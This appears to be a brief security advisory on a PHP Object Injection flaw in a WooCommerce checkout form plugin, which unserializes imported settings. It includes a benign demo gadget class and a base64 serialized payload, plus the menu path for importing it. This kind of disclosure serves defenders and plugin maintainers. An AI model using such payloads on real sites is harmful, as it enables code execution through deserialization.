The plugin unserialize user input provided via the settings, which could allow high privilege users such as admin to perform PHP Object Injection when a suitable gadget is present
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Then import the following payload via WooCommerce > Checkout Form > Advanced Settings > Backup and Import Settings: Tzo0OiJFdmlsIjowOnt9Ow==
Tzo0OiJFdmlsIjowOnt9Ow== being the base64 encode of serialized object: O:4:"Evil":0:{};